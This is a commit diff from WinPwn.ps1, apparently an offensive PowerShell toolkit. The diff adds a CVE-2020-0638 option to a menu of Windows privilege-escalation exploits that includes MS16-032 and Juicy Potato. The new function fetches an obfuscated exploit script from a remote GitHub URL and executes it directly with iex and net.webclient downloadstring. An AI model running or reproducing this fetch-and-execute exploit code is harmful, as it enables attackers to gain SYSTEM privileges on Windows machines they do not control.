Skip to content

Commit f9685ac

Browse files
1 parent 2e40b8e commit f9685ac

1 file changed

Lines changed: 19 additions & 5 deletions

File tree

WinPwn.ps1

Lines changed: 19 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -546,14 +546,15 @@ __ ___ ____
546546
Write-Host "================ WinPwn ================"
547547
Write-Host -ForegroundColor Green '1. MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!'
548548
Write-Host -ForegroundColor Green '2. MS16-032 - (2008/7/8/10/2012)!'
549-
Write-Host -ForegroundColor Green '3. MS16-135 - (2016)! '
549+
Write-Host -ForegroundColor Green '3. MS16-135 - (WS2k16 only)! '
550550
Write-Host -ForegroundColor Green '4. CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1! '
551551
Write-Host -ForegroundColor Green '5. CVE-2019-0841 - April 2019!'
552552
Write-Host -ForegroundColor Green '6. CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019! '
553553
Write-Host -ForegroundColor Green '7. CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019! '
554554
Write-Host -ForegroundColor Green '8. CVE-2019-1215 - September 2019 - x64 only! '
555-
Write-Host -ForegroundColor Green '9. Juicy-Potato Exploit from SeImpersonate or SeAssignPrimaryToken to SYSTEM!'
556-
Write-Host -ForegroundColor Green '10. Exit. '
555+
Write-Host -ForegroundColor Green '9. CVE-2020-0638 - February 2020 - x64 only! '
556+
Write-Host -ForegroundColor Green '10. Juicy-Potato Exploit from SeImpersonate or SeAssignPrimaryToken to SYSTEM!'
557+
Write-Host -ForegroundColor Green '11. Exit. '
557558
Write-Host "================ WinPwn ================"
558559
$masterquestion = Read-Host -Prompt 'Please choose wisely, master:'
559560

@@ -567,10 +568,11 @@ __ ___ ____
567568
6{cve-2019-1069}
568569
7{CVE-2019-1129}
569570
8{CVE-2019-1215}
570-
9{juicypot}
571+
9{CVE-2020-0638}
572+
10{juicypot}
571573
}
572574
}
573-
While ($masterquestion -ne 10)
575+
While ($masterquestion -ne 11)
574576

575577
}
576578

@@ -582,6 +584,18 @@ function testtemp
582584
}
583585
}
584586

587+
function CVE-2020-0638
588+
{
589+
if ([Environment]::Is64BitProcess)
590+
{
591+
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/cve-2020-0638.ps1')
592+
}
593+
else
594+
{
595+
Write-Host "Only x64, Sorry"
596+
}
597+
}
598+
585599
function CVE-2019-1215
586600
{
587601
testtemp

0 commit comments

Comments
 (0)